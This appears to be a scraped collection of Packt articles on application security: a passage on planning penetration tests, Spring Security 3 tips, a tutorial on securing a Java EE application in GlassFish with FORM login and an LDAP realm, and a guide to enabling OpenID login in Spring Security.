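Capturing the answers in one place makes the later validation step — where the client removes any misleading information — a simple review of a single object rather than a hunt through e-mail threads.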
The key variables involved in preparing a test plan are a structured testing process, resource allocation, cost analysis, a non-disclosure agreement, a penetration testing contract, and rules of engagement. Each of these areas is addressed with a short description below: Structured testing process: After analyzing the details provided by our customer, it may be important to restructure the BackTrack testing methodology. For instance, if the social engineering service is excluded, we would have to remove it from our formal testing process. This practice is sometimes known as test process validation. It is a repetitive task that has to be revisited whenever there is a change in client requirements. If there are any unnecessary steps involved during the test execution, it may result in a violation of the organization's policies and incur serious penalties. Additionally, based on the test type there will be a number of changes to the test process. For instance, white-box testing does not require an information gathering and target discovery phase, because the auditor is already aware of the internal infrastructure. Resource allocation: Determining the expert knowledge required to achieve the completeness of a test is one of the most substantial areas. Thus, assigning a skilled penetration tester to a certain task may result in a better security assessment. For instance, application penetration testing requires a dedicated application security tester. This activity plays a significant role in the success of the penetration testing assignment. Cost analysis: The cost of penetration testing depends on several factors. These may involve the number of days allocated to fulfill the scope of the project, additional service requirements such as social engineering and physical security assessment, and the expert knowledge required to assess the specific technology. From the industry viewpoint, this should combine a qualitative and quantitative value. 
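The cost-analysis factors just listed can be turned into a rough estimator for budgeting discussions. The model and the rates below are invented placeholders for illustration, not industry figures:

```java
public class CostEstimate {
    // Illustrative cost model: base effort in days times a day rate, plus
    // flat surcharges for optional add-on services. All numbers are made up.
    static int estimate(int days, int dayRate,
                        boolean socialEngineering, boolean physicalAssessment) {
        int total = days * dayRate;
        if (socialEngineering) total += 2 * dayRate;  // extra effort for the add-on
        if (physicalAssessment) total += 3 * dayRate; // on-site work costs more
        return total;
    }

    public static void main(String[] args) {
        // Ten testing days at a hypothetical rate, with social engineering in scope.
        System.out.println(estimate(10, 1000, true, false)); // 12000
    }
}
```

Even a toy model like this makes the qualitative/quantitative split explicit: the day count and rate are quantitative inputs, while which add-on services belong in scope is the qualitative judgment agreed with the client.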
Non-disclosure agreement (NDA): Before starting the test process it is necessary to sign an agreement which reflects the interests of both parties, the "client" and the "penetration tester". Using such a mutual non-disclosure agreement should clarify the terms and conditions under which the test is aligned. It is important for the penetration tester to comply with these terms throughout the test process. Violating any single term of the agreement can result in serious penalties or permanent dismissal from the job. Penetration testing contract: There is always a need for a legal contract which will reflect all the technical matters between the "client" and the "penetration tester". This is where the penetration testing contract comes in. The basic information inside such contracts focuses on what testing services are being offered, what their main objectives are, how they will be conducted, payment declaration, and maintaining the confidentiality of the whole project. Rules of engagement: The process of penetration testing can be invasive and requires a clear understanding of what the assessment demands, what support will be provided by the client, and what type of potential impact or effect each assessment technique may have. Moreover, the tools used in the penetration testing process should clearly state their purpose so that the tester can use them accordingly. The rules of engagement define all of these statements in a more detailed fashion to address the necessity of the technical criteria that should be followed during the test execution. By preparing each of these subparts of the test plan, you can ensure a consistent view of the penetration testing process. This will provide the penetration tester with more specific assessment details derived from the client requirements. It is always recommended to prepare a test plan checklist which can be used to verify the assessment criteria and its underlying terms with the contracting party.

Spring Security 3: Tips and Tricks
Packt
28 Feb 2011
6 min read
Spring Security 3 Make your web applications impenetrable. Implement authentication and authorization of users. Integrate Spring Security 3 with common external security providers. Packed full of concrete, simple, and concise examples. It's a good idea to change the default value of the spring_security_login page URL. Tip: Not only would the resulting URL be more user- or search-engine friendly, it would also disguise the fact that you're using Spring Security as your security implementation. Obscuring Spring Security in this way could make it harder for malicious hackers to find holes in your site in the unlikely event that a security hole is discovered in Spring Security. Although security through obscurity does not reduce your application's vulnerability, it does make it harder for standardized hacking tools to determine what types of vulnerabilities you may be susceptible to.   Evaluating authorization rules Tip: For any given URL request, Spring Security evaluates authorization rules in top-to-bottom order. The first rule matching the URL pattern will be applied. Typically, this means that your authorization rules will be ordered from most specific to least specific. It's important to remember this when developing complicated rule sets, as developers can often get confused over which authorization rule takes effect. Just remember the top-to-bottom order, and you can easily find the correct rule in any scenario!   Using the JSTL URL tag to handle relative URLs Tip: Use the JSTL core library's url tag to ensure that URLs you provide in your JSP pages resolve correctly in the context of your deployed web application. The url tag will resolve URLs provided as relative URLs (starting with a /) to the root of the web application. You may have seen other techniques to do this using JSP expression code (<%=request.getContextPath() %>), but the JSTL url tag allows you to avoid inline code!   
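The top-to-bottom, first-match evaluation described in the authorization-rules tip can be illustrated with a tiny framework-agnostic sketch. This is our own illustration of the matching semantics, not Spring Security code:

```java
import java.util.LinkedHashMap;
import java.util.Map;

public class RuleChain {
    // Ordered pattern -> required-role map; the first matching prefix wins,
    // mirroring Spring Security's top-to-bottom rule evaluation.
    static final Map<String, String> RULES = new LinkedHashMap<>();
    static {
        RULES.put("/admin/", "ROLE_ADMIN");   // most specific rules first
        RULES.put("/account/", "ROLE_USER");
        RULES.put("/", "ANONYMOUS");          // catch-all last, or it shadows the rest
    }

    static String requiredRole(String url) {
        for (Map.Entry<String, String> rule : RULES.entrySet()) {
            if (url.startsWith(rule.getKey())) {
                return rule.getValue();
            }
        }
        return "DENY";
    }

    public static void main(String[] args) {
        System.out.println(requiredRole("/admin/users")); // ROLE_ADMIN
        System.out.println(requiredRole("/home"));        // ANONYMOUS
    }
}
```

If the catch-all `/` entry were moved to the top of the map, every request would match it first and the admin rule would never fire — exactly the misordering bug the tip warns about.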
Modifying the username or password and the remember me feature Tip: As you may have anticipated, if the user changes their username or password, any remember me tokens set will no longer be valid. Make sure that you provide appropriate messaging to users if you allow them to change these bits of their account.   Configuration of remember me session cookies Tip: If token-validity-seconds is set to -1, the login cookie will be set to a session cookie, which does not persist after the user closes their browser. The token will be valid (assuming the user doesn't close their browser) for a non-configurable length of 2 weeks. Don't confuse this with the cookie that stores your user's session ID; they're two different things with similar names!   Checking full authentication without expressions Tip: If your application does not use SpEL expressions for access declarations, you can still check if the user is fully authenticated by using the IS_AUTHENTICATED_FULLY access rule (for example, access="IS_AUTHENTICATED_FULLY"). Be aware, however, that standard role access declarations aren't as expressive as SpEL ones, so you will have trouble handling complex boolean expressions.   Debugging remember me cookies Tip: There are two difficulties when attempting to debug issues with remember me cookies. The first is getting the cookie value at all! Spring Security doesn't offer any log level that will log the cookie value that was set. We'd suggest a browser-based tool such as Chris Pederick's Web Developer plug-in (http://chrispederick.com/work/web-developer/) for Mozilla Firefox. Browser-based development tools typically allow selective examination (and even editing) of cookie values. The second (admittedly minor) difficulty is decoding the cookie value. You can feed the cookie value into an online or offline Base64 decoder (remember to add a trailing = sign to make it a valid Base64-encoded string!)   
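The decoding step can also be scripted instead of pasting the cookie value into an online decoder. A small sketch follows; the restored-padding trick mirrors the "add a trailing = sign" advice in the tip, and the sample token value is fabricated for illustration:

```java
import java.util.Base64;

public class RememberMeDecoder {
    // Decode a remember-me cookie value. Padding is restored to a multiple of
    // four characters, since the trailing '=' signs are often stripped.
    static String decode(String cookieValue) {
        StringBuilder padded = new StringBuilder(cookieValue);
        while (padded.length() % 4 != 0) {
            padded.append('=');
        }
        return new String(Base64.getDecoder().decode(padded.toString()));
    }

    public static void main(String[] args) {
        // Fabricated example roughly shaped like "username:expiryMillis:signature".
        String cookie = Base64.getEncoder()
                .encodeToString("james:1302380160000:9f2c7".getBytes())
                .replace("=", ""); // simulate stripped padding
        System.out.println(decode(cookie)); // james:1302380160000:9f2c7
    }
}
```

Seeing the decoded username and expiry timestamp in cleartext usually makes it obvious whether a "remember me login stopped working" report is an expiry problem or a signature problem.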
Making effective use of an in-memory UserDetailsService Tip: A very common scenario for the use of an in-memory UserDetailsService and hard-coded user lists is the authoring of unit tests for secured components. Unit test authors often code or configure the minimal context to test the functionality of the component under test. Using an in-memory UserDetailsService with a well-defined set of users and GrantedAuthority values provides the test author with an easily controlled test environment.   Storing sensitive information Tip: Many guidelines that apply to the storage of passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways, for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).   Annotations at the class level Tip: Be aware that method-level security annotations can also be applied at the class level! Method-level annotations, if supplied, will always override annotations specified at the class level. This can be helpful if your business needs dictate the specification of security policies for an entire class at a time. Take care to use this functionality in conjunction with good comments and coding standards, so that developers are very clear about the security characteristics of a class and its methods.   Authenticating the user against LDAP Tip: Do not make the very common mistake of configuring an <authentication-provider> with a user-details-service-ref referring to an LdapUserDetailsService if you are intending to authenticate the user against LDAP itself!   
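The last-four-digits display mentioned in the sensitive-information tip can be sketched as a small helper. This is illustrative only; in a real system it would sit alongside proper encryption of the full card number, and the length assumption would be validated:

```java
public class CardMasker {
    // Show only the last four digits, as in "XXXX XXXX XXXX 1234".
    // Assumes a 16-digit PAN; a production implementation would validate input.
    static String maskPan(String pan) {
        String digits = pan.replaceAll("\\D", ""); // drop spaces, dashes, etc.
        String last4 = digits.substring(digits.length() - 4);
        return "XXXX XXXX XXXX " + last4;
    }

    public static void main(String[] args) {
        System.out.println(maskPan("4111-1111-1111-1234")); // XXXX XXXX XXXX 1234
    }
}
```

The design point is that the masked form is derived on the way into storage or display, so the cleartext last-four column never needs to be reconstructed by decrypting the full number just to render a card picker.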
Externalize URLs and environment-dependent settings Tip: Coding URLs into Spring configuration files is a bad idea. Typically, storage and consistent reference to URLs is pulled out into a separate properties file, with placeholders consistent with the Spring PropertyPlaceholderConfigurer. This allows for reconfiguration of environment-specific settings via externalizable properties files without touching the Spring configuration files, and is generally considered good practice. Summary In this article we took a look at some of the tips and tricks for Spring Security. Further resources on this subject: Spring Security 3 [Book] Migration to Spring Security 3 [Article] Opening up to OpenID with Spring Security [Article] Spring Security: Configuring Secure Passwords [Article]

Developing Secure Java EE Applications in GlassFish
Packt
31 May 2010
14 min read
In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In the course of the article, we will cover the following topics:
- Analyzing Java EE application security requirements
- Including security requirements in Java EE application design
- Developing a secure Business layer using EJBs
- Developing a secure Presentation layer using JSP and Servlets
- Configuring deployment descriptors of Java EE applications
- Specifying the security realm for enterprise applications
- Developing a secure application client module
- Configuring the Application Client Container

Read Designing Secure Java EE Applications in GlassFish here. Developing the Presentation layer The Presentation layer is the layer closest to end users when we are developing applications that are meant to be used by humans instead of other applications. In our application, the Presentation layer is a Java EE web application consisting of the elements listed in the following table. In the table you can see that the different JSP files are categorized into different directories to make the security description easier.

Element Name: Element Description
index.jsp: Application entry point. It has some links to functional JSP pages like toMilli.jsp and so on.
auth/login.html: Presents a custom login page to users when they try to access a restricted resource. This file is placed inside the auth directory of the web application.
auth/logout.jsp: Logs users out of the system after their work is finished.
auth/loginError.html: Unsuccessful login attempts redirect users to this page. This file is placed inside the auth directory of the web application.
jsp/toInch.jsp: Converts a given length to inches; it is only available to managers.
jsp/toMilli.jsp: Converts a given length to millimeters; this page is available to any employee.
jsp/toCenti.jsp: Converts a given length to centimeters; this functionality is available to everyone. 
Converter servlet: Receives the request, invokes the session bean to perform the conversion, and returns the value to the user.
auth/accessRestricted.html: An error page for error 401, which occurs when authorization fails.
Deployment descriptors: The deployment descriptors in which we describe the security constraints over the resources we want to protect.

Now that our application building blocks are identified we can start implementing them to complete the application. Before anything else, let's implement the JSP files that provide the conversion GUI. The directory layout and content of the Web module is shown in the following figure: Implementing the Conversion GUI In our application we have an index.jsp file that acts as a gateway to the entire system and is shown in the following listing:

<html>
<head><title>Select A conversion</title></head>
<body><h1>Select A conversion</h1>
<a href="auth/login.html">Login</a> <br/>
<a href="jsp/toCenti.jsp">Convert Meter to Centimeter</a> <br/>
<a href="jsp/toInch.jsp">Convert Meter to Inch</a> <br/>
<a href="jsp/toMilli.jsp">Convert to Millimeter</a><br/>
<a href="auth/logout.jsp">Logout</a>
</body>
</html>

Implementing the Converter servlet The Converter servlet receives the conversion value and method from the JSP files and calls the corresponding method of a session bean to perform the actual conversion. 
The following listing shows the Converter servlet content:

@WebServlet(name="Converter", urlPatterns={"/Converter"})
public class Converter extends HttpServlet {

    @EJB
    private ConversionLocal conversionBean;

    protected void processRequest(HttpServletRequest request,
            HttpServletResponse response) throws ServletException, IOException {
    }

    @Override
    protected void doPost(HttpServletRequest request,
            HttpServletResponse response) throws ServletException, IOException {
        System.out.println("POST");
        response.setContentType("text/html;charset=UTF-8");
        PrintWriter out = response.getWriter();
        try {
            int valueToconvert = Integer.parseInt(request.getParameter("meterValue"));
            String method = request.getParameter("method");
            out.print("<hr/> <center><h2>Conversion Result is: ");
            if (method.equalsIgnoreCase("toMilli")) {
                out.print(conversionBean.toMilimeter(valueToconvert));
            } else if (method.equalsIgnoreCase("toCenti")) {
                out.print(conversionBean.toCentimeter(valueToconvert));
            } else if (method.equalsIgnoreCase("toInch")) {
                out.print(conversionBean.toInch(valueToconvert));
            }
            out.print("</h2></center>");
        } catch (AccessLocalException ale) {
            response.sendError(401);
        } finally {
            out.close();
        }
    }
}

Starting from the beginning, we use annotations to configure the servlet mapping and servlet name instead of using the deployment descriptor for it. Then we use dependency injection to inject an instance of the Conversion session bean into the servlet, and decide which one of its methods we should invoke based on the conversion type that the caller JSP sends as a parameter. Finally, we catch javax.ejb.AccessLocalException and send an HTTP 401 error back to inform the client that it does not have the required privileges to perform the requested action. The following figure shows what the result of an invocation could look like: Each servlet needs some description elements in the deployment descriptor, or included as annotations. 
Implementing the conversion JSP files is the last step in implementing the functional pieces. In the following listing you can see the content of the toMilli.jsp file:

<html>
<head><title>Convert To Millimeter</title></head>
<body><h1>Convert To Millimeter</h1>
<form method=POST action="../Converter">Enter Value to Convert:
<input name=meterValue>
<input type="hidden" name="method" value="toMilli">
<input type="submit" value="Submit" />
</form>
</body>
</html>

The toCenti.jsp and toInch.jsp files look the same, except for the descriptive content and the value of the hidden method parameter, which will be toCenti and toInch respectively. Now we are finished with the functional parts of the Web layer; we just need to implement the required GUI for the security measures. Implementing the authentication frontend For authentication, we should use a custom login page to have a unified look and feel across the entire web frontend of our application. We can use a custom login page with the FORM authentication method. To implement the FORM authentication method we need to implement a login page and an error page, to which users are redirected in case authentication fails. Implementing authentication requires us to go through the following steps: Implementing login.html and loginError.html Including the security description in web.xml and sun-web.xml or sun-application.xml Implementing a login page In FORM authentication we implement our own login form to collect the username and password, and we then pass them to the container for authentication. We should let the container know which field is the username and which field is the password by using standard names for these fields. The username field is j_username and the password field is j_password. To pass these fields to the container for authentication we should use j_security_check as the form action. 
When we post to j_security_check, the servlet container takes action and authenticates the included j_username and j_password against the configured realm. The listing below shows the login.html content:

<form method="POST" action="j_security_check">
Username: <input type="text" name="j_username"><br />
Password: <input type="password" name="j_password"><br />
<br />
<input type="submit" value="Login">
<input type="reset" value="Reset">
</form>

The following figure shows the login page which is shown when an unauthenticated user tries to access a restricted resource: Implementing a logout page A user may need to log out of our system after they're finished using it, so we need to implement a logout page. The following listing shows the logout.jsp file:

<% session.invalidate(); %>
<body>
<center>
<h1>Logout</h1>
You have successfully logged out.
</center>
</body>

Implementing a login error page Now we should implement loginError.html, an authentication error page to inform the user about the authentication failure:

<html>
<body>
<h2>A Login Error Occurred</h2>
Please click <a href="login.html">here</a> for another try.
</body>
</html>

Implementing an access restricted page When an authenticated user without the required privileges tries to invoke a session bean method, the EJB container throws a javax.ejb.AccessLocalException. To show a meaningful error page to our users we should either map this exception to an error page, or catch the exception, log the event for auditing purposes, and then use the sendError() method of the HttpServletResponse object to send out an error code. We will map the HTTP error code to our custom web pages with meaningful descriptions using the web.xml deployment descriptor. You will see which configuration elements we use to do the mapping. The following snippet shows the AccessRestricted.html file:

<body>
<center>
<p>You need to login to access the requested resource. 
To login go to the <a href="auth/login.html">Login Page</a></p></center>
</body>

Configuring deployment descriptors So far we have implemented the required files for FORM-based authentication, and we only need to include the required descriptions in the web.xml file. Looking back at the application requirement definitions, we see that anyone can use the meter to centimeter conversion functionality, while any other functionality requires the user to log in. We use three different JSP pages for the different types of conversion. We do not need any constraint on toCenti.jsp, therefore we do not need to include any definition for it. Per the application description, any employee can access the toMilli.jsp page. The security constraint definition for this page is shown in the following listing:

<security-constraint>
<display-name>You should be an employee</display-name>
<web-resource-collection>
<web-resource-name>all</web-resource-name>
<description/>
<url-pattern>/jsp/toMilli.jsp</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
<http-method>DELETE</http-method>
</web-resource-collection>
<auth-constraint>
<description/>
<role-name>employee_role</role-name>
</auth-constraint>
</security-constraint>

We should put enough constraints on the toInch.jsp page so that only managers can access it. The listing below shows the security constraint definition for this page:

<security-constraint>
<display-name>You should be a manager</display-name>
<web-resource-collection>
<web-resource-name>Inch</web-resource-name>
<description/>
<url-pattern>/jsp/toInch.jsp</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
<auth-constraint>
<description/>
<role-name>manager_role</role-name>
</auth-constraint>
</security-constraint>

Finally we need to define the roles we used in the deployment descriptor. The following snippet shows how we define these roles in web.xml. 
```xml
<security-role>
  <description/>
  <role-name>manager_role</role-name>
</security-role>
<security-role>
  <description/>
  <role-name>employee_role</role-name>
</security-role>
```

Looking back at the application requirements, we need to define a data constraint to ensure that the usernames and passwords provided by our users are safe during transmission. The following listing shows how we can define this data constraint on the login.html page:

```xml
<security-constraint>
  <display-name>Login page Protection</display-name>
  <web-resource-collection>
    <web-resource-name>Authentication</web-resource-name>
    <description/>
    <url-pattern>/auth/login.html</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
  </web-resource-collection>
  <user-data-constraint>
    <description/>
    <transport-guarantee>CONFIDENTIAL</transport-guarantee>
  </user-data-constraint>
</security-constraint>
```

One more step and our web.xml file will be complete. In this step we define an error page for the HTTP 401 status code, which the application server returns when it cannot perform the requested action because of a negative authorization result. The following snippet shows the required elements:

```xml
<error-page>
  <error-code>401</error-code>
  <location>AccessRestricted.html</location>
</error-page>
```

Now that we are finished declaring the security constraints, we can create the conversion pages, and afterwards start on the business layer and its security requirements.

Specifying the security realm

Up to this point we have defined all the constraints our application requires, but we still need to follow one more step to complete the application's security configuration. The last step is specifying the security realm and authentication method. We should specify FORM authentication and, per the application description, authentication must happen against the company-wide LDAP server. Here we are going to use the LDAP security realm LDAPRealm.
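To make the effect of the role declarations above concrete, here is a plain-Java sketch of the authorization decision the container makes for us at request time. The class and method names are hypothetical; in the real application the container performs this check from the web.xml constraints, and no such class exists:

```java
import java.util.Map;
import java.util.Set;

// Hypothetical sketch of the container's authorization decision for the
// security constraints declared above: each constrained URL pattern maps
// to the set of roles allowed to access it.
public class ConstraintCheck {
    static final Map<String, Set<String>> ALLOWED = Map.of(
        "/jsp/toMillimeter.html", Set.of("employee_role"),
        "/jsp/toInch.html", Set.of("manager_role"));

    // Unconstrained resources are open to everyone (e.g. toCentimeter.html);
    // constrained ones require at least one matching role.
    public static boolean canAccess(String url, Set<String> userRoles) {
        Set<String> required = ALLOWED.get(url);
        if (required == null) return true;
        return userRoles.stream().anyMatch(required::contains);
    }
}
```

With this sketch, a caller holding only employee_role is turned away from the inch conversion page, mirroring the auth-constraint elements above.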
We need to import a new LDIF file into our LDAP server, which contains the group and user definitions required for this article. To import the file we can use the following command, assuming that you downloaded the source code bundle from https://www.packtpub.com//sites/default/files/downloads/9386_Code.zip and extracted it:

```shell
import-ldif --ldifFile path/to/chapter03/users.ldif --backendID userRoot \
  --clearBackend --hostname 127.0.0.1 --port 4444 --bindDN cn=gf cn=admin \
  --bindPassword admin --trustAll --noPropertiesFile
```

The following table shows the users and groups defined inside the users.ldif file:

Username and password | Group membership
james/james           | manager, employee
meera/meera           | employee

We used OpenDS for the realm data storage; it holds two users, one in the employee group only and the other in both the employee and manager groups. To configure the authentication realm we need to include the following snippet in the web.xml file:

```xml
<login-config>
  <auth-method>FORM</auth-method>
  <realm-name>LDAPRealm</realm-name>
  <form-login-config>
    <form-login-page>/auth/login.html</form-login-page>
    <form-error-page>/auth/loginError.html</form-error-page>
  </form-login-config>
</login-config>
```

If we treated our Web and EJB modules as separate modules, we would have to specify the role mappings for each module separately using the GlassFish deployment descriptors sun-web.xml and sun-ejb-jar.xml. But because we are going to bundle our modules into an Enterprise Application Archive (EAR) file, we can use the GlassFish deployment descriptor for enterprise applications to define the role mapping in one place and let all modules use those definitions. The following listing shows the role and group mapping in the sun-application.xml file.
```xml
<sun-application>
  <security-role-mapping>
    <role-name>manager_role</role-name>
    <group-name>manager</group-name>
  </security-role-mapping>
  <security-role-mapping>
    <role-name>employee_role</role-name>
    <group-name>employee</group-name>
  </security-role-mapping>
  <realm>LDAPRealm</realm>
</sun-application>
```

The security-role-mapping element we used in sun-application.xml has the same schema as the security-role-mapping element of the sun-web.xml and sun-ejb-jar.xml files. You may have noticed that we also have a realm element in addition to the role mapping elements: we can use the realm element of sun-application.xml to specify the default authentication realm for the entire application instead of specifying it for each module separately.

Summary

In this article series, we covered the following topics:

- Analyzing Java EE application security requirements
- Including security requirements in Java EE application design
- Developing a secure business layer using EJBs
- Developing a secure presentation layer using JSP and Servlets
- Configuring deployment descriptors of Java EE applications
- Specifying a security realm for enterprise applications
- Developing a secure application client module
- Configuring the Application Client Container

We learnt how to develop a secure Java EE application with all standard modules, including Web, EJB, and application client modules.
Packt
31 May 2010
2 min read
Designing Secure Java EE Applications in GlassFish

Security is an orthogonal concern for an application, and we should assess it right from the start by reviewing the analysis we receive from business and functional analysts. Assessing the security requirements results in understanding the functionalities we need to include in our architecture to deliver a secure application covering the necessary requirements. Security necessities can cover a wide range of requirements, varying from simple authentication to several sub-systems, including an identity and access management system and transport security, which may involve encrypting data as well.

In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In the course of the series, we will cover the following topics:

- Analyzing Java EE application security requirements
- Including security requirements in Java EE application design
- Developing a secure business layer using EJBs
- Developing a secure presentation layer using JSP and Servlets
- Configuring deployment descriptors of Java EE applications
- Specifying a security realm for enterprise applications
- Developing a secure application client module
- Configuring the Application Client Container

Developing Secure Java EE Applications in GlassFish is the second part of this article series.

Understanding the sample application

The sample application that we are going to develop converts different length measurement units into each other: meter to centimeter, millimeter, and inch. The application also stores usage statistics for later use. Guest users who prefer not to log in can only use meter-to-centimeter conversion, while any company employee can use meter-to-centimeter and meter-to-millimeter conversion, and any of the company's managers can access meter-to-inch conversion in addition to the two other conversion functionalities. We should show a custom login page to comply with the site-wide look and feel.
No encryption is required for communication between clients and our application, but we need to make sure that no one can intercept and steal the usernames and passwords provided by members. All members' identification information is stored in the company-wide directory server. The following diagram shows the high-level functionality of the sample application: we have a login action and three conversion actions; some can only be accessed after logging in, while others can be accessed without logging in.
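The requirements above can be sketched in plain Java. The class and method names below are illustrative only; the real application implements the conversions in EJBs and enforces access through the container, not through an explicit check like this:

```java
// Sketch of the sample application's conversion rules and role-based
// access matrix, as stated in the requirements: guests get centimeter
// conversion, employees also get millimeter, managers get everything.
public class ConverterSketch {
    public static double toCentimeters(double meters) { return meters * 100; }
    public static double toMillimeters(double meters) { return meters * 1000; }
    public static double toInches(double meters)      { return meters / 0.0254; }

    // Returns whether a caller with the given role may use a conversion.
    public static boolean mayConvert(String role, String target) {
        switch (target) {
            case "centimeter": return true;  // open to guests as well
            case "millimeter": return role.equals("employee") || role.equals("manager");
            case "inch":       return role.equals("manager");
            default:           return false;
        }
    }
}
```

The access matrix mirrors the prose exactly: each step up in privilege adds one more conversion to the set the caller may invoke.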
Packt
27 May 2010
7 min read
Opening up to OpenID with Spring Security

(For more resources on Spring, see here.)

The promising world of OpenID

The promise of OpenID as a technology is to allow users on the web to centralize their personal data and information with a trusted provider, and then use the trusted provider as a delegate to establish trustworthiness with other sites with whom the user wants to interact. In concept, this type of login through a trusted third party has been in existence for a long time, in many different forms (Microsoft Passport, for example, became one of the more notable central login services on the web for some time). OpenID's distinct advantage is that the OpenID provider needs to implement only the public OpenID protocol to be compatible with any site seeking to integrate login with OpenID. The OpenID specification itself is an open specification, which leads to the fact that there is currently a diverse population of public providers up and running the same protocol. This is an excellent recipe for healthy competition, and it is good for consumer choice.

The following diagram illustrates the high-level relationship between a site integrating OpenID during the login process and OpenID providers. We can see that the user presents his credentials in the form of a unique named identifier, typically a Uniform Resource Identifier (URI), which is assigned to the user by their OpenID provider and is used to uniquely identify both the user and the OpenID provider. This is commonly done by either prepending a subdomain to the URI of the OpenID provider (for example, https://jamesgosling.myopenid.com/), or appending a unique identifier to the URI of the OpenID provider (for example, https://me.yahoo.com/jamesgosling). We can see from the presented URI that both methods clearly identify both the OpenID provider (via domain name) and the unique user identifier.

Don't trust OpenID unequivocally! You can see here a fundamental assumption that can fool users of the system.
It is possible for us to sign up for an OpenID which would make it appear as though we were James Gosling, even though we obviously are not. Do not make the false assumption that just because a user has a convincing-sounding OpenID (or OpenID delegate provider) they are the authentic person, without requiring additional forms of identification. Thinking about it another way, if someone came to your door just claiming he was James Gosling, would you let him in without verifying his ID?

The OpenID-enabled application then redirects the user to the OpenID provider, at which the user presents his credentials to the provider, which is then responsible for making an access decision. Once the access decision has been made by the provider, the provider redirects the user to the originating site, which is now assured of the user's authenticity. OpenID is much easier to understand once you have tried it. Let's add OpenID to the JBCP Pets login screen now!

Signing up for an OpenID

In order to get the full value of the exercises in this section (and to be able to test login), you'll need your own OpenID from one of the many available providers, of which a partial listing is available at http://openid.net/get-an-openid/. Common OpenID providers with which you probably already have an account are Yahoo!, AOL, Flickr, or MySpace. Google's OpenID support is slightly different, as we'll see later in this article when we add Sign In with Google support to our login page. To get full value out of the exercises in this article, we recommend you have accounts with at least:

- myOpenID
- Google

Enabling OpenID authentication with Spring Security

Spring Security provides convenient wrappers around provider integrations that are actually developed outside the Spring ecosystem. In this vein, the openid4java project (http://code.google.com/p/openid4java/) provides the underlying OpenID provider discovery and request/response negotiation for the Spring Security OpenID functionality.
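Both identifier styles described earlier (provider subdomain or user-specific path) name the provider through the host part of the URI, which standard Java URI handling can extract. The helper class below is a hypothetical illustration, not part of openid4java or Spring Security:

```java
import java.net.URI;

// Illustrative helper: an OpenID identifier is a URI, and the OpenID
// provider is identified by the URI's host, whether the user appears
// as a subdomain or as a path segment.
public class OpenIdIdentifier {
    public static String providerHost(String openId) {
        return URI.create(openId).getHost();
    }
}
```

For https://jamesgosling.myopenid.com/ the host carries both the provider and the user; for https://me.yahoo.com/jamesgosling the host names only the provider and the path names the user.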
Writing an OpenID login form

It's typically the case that a site will present both standard (username and password) and OpenID login options on a single login page, allowing the user to select one or the other, as we can see in the JBCP Pets target login page. The code for the OpenID-based form is as follows:

```html
<h1>Or, Log Into Your Account with OpenID</h1>
<p>
  Please use the form below to log into your account with OpenID.
</p>
<form action="j_spring_openid_security_check" method="post">
  <label for="openid_identifier">Login</label>:
  <input id="openid_identifier" name="openid_identifier" size="20"
         maxlength="100" type="text"/>
  <img src="images/openid.png" alt="OpenID"/>
  <br />
  <input type="submit" value="Login"/>
</form>
```

The name of the form field, openid_identifier, is not a coincidence. The OpenID specification recommends that implementing websites use this name for their OpenID login field, so that user agents (browsers) have semantic knowledge of the function of this field. There are even browser plug-ins, such as Verisign's OpenID SeatBelt (https://pip.verisignlabs.com/seatbelt.do), that take advantage of this knowledge to pre-populate your OpenID credentials into any recognizable OpenID field on a page.

You'll note that we don't offer the remember me option with OpenID login. This is due to the fact that the redirection to and from the vendor causes the remember me checkbox value to be lost, so that when the user is successfully authenticated, they no longer have the remember me option indicated. This is unfortunate, but it ultimately increases the security of OpenID as a login mechanism for our site, as OpenID forces the user to establish a trust relationship through the provider with each and every login.
Configuring OpenID support in Spring Security

Turning on basic OpenID support, via the inclusion of a servlet filter and authentication provider, is as simple as adding a directive to our <http> configuration element in dogstore-security.xml as follows:

```xml
<http auto-config="true" ...>
  <!-- Omitting content... -->
  <openid-login/>
</http>
```

After adding this configuration element and restarting the application, you will be able to use the OpenID login form to present an OpenID and navigate through the OpenID authentication process. When you are returned to JBCP Pets, however, you will be denied access. This is because your credentials won't have any roles assigned to them. We'll take care of this next.

Adding OpenID users

As we do not yet have OpenID-enabled new user registration, we'll need to manually insert the user account (that we'll be testing) into the database, by adding it to test-users-groups-data.sql in our database bootstrap code. We recommend that you use myOpenID for this step (notably, you will have trouble with Yahoo!, for reasons we'll explain in a moment). If we assume that our OpenID is https://jamesgosling.myopenid.com/, then the SQL that we'd insert in this file is as follows:

```sql
insert into users(username, password, enabled, salt) values
  ('https://jamesgosling.myopenid.com/', 'unused', true,
   CAST(RAND()*1000000000 AS varchar));
insert into group_members(group_id, username)
  select id, 'https://jamesgosling.myopenid.com/' from groups
  where group_name='Administrators';
```

You'll note that this is similar to the other data that we inserted for our traditional username-and-password-based admin account, with the exception that we have the value unused for the password. We do this, of course, because OpenID-based login doesn't require our site to store a password on behalf of the user!
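The salt column in that SQL is seeded with a pseudo-random number via the database's RAND() function. The same idea expressed in Java, using SecureRandom, looks like this (the helper class is hypothetical, shown only to clarify what the SQL expression produces):

```java
import java.security.SecureRandom;

// Illustrative Java equivalent of CAST(RAND()*1000000000 AS varchar):
// a random non-negative integer below one billion, rendered as a string.
public class SaltGenerator {
    private static final SecureRandom RANDOM = new SecureRandom();

    public static String randomSalt() {
        return Integer.toString(RANDOM.nextInt(1_000_000_000));
    }
}
```

SecureRandom is preferable to a plain database RAND() when the salt is generated in application code, since its output is harder to predict.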
The observant reader will note, however, that this does not allow a user to create an arbitrary username and password and associate them with an OpenID; we describe this process briefly later in this article, and you are welcome to explore how to do this as an advanced application of the technology.

At this point, you should be able to complete a full login using OpenID. The sequence of redirects is illustrated with arrows in the following screenshot. We've now OpenID-enabled JBCP Pets login! Feel free to test using several OpenID providers. You'll notice that, although the overall functionality is the same, the experience that the provider offers when reviewing and accepting the OpenID request differs greatly from provider to provider.
Packt
24 May 2010
6 min read
Encode your password with Spring Security 3

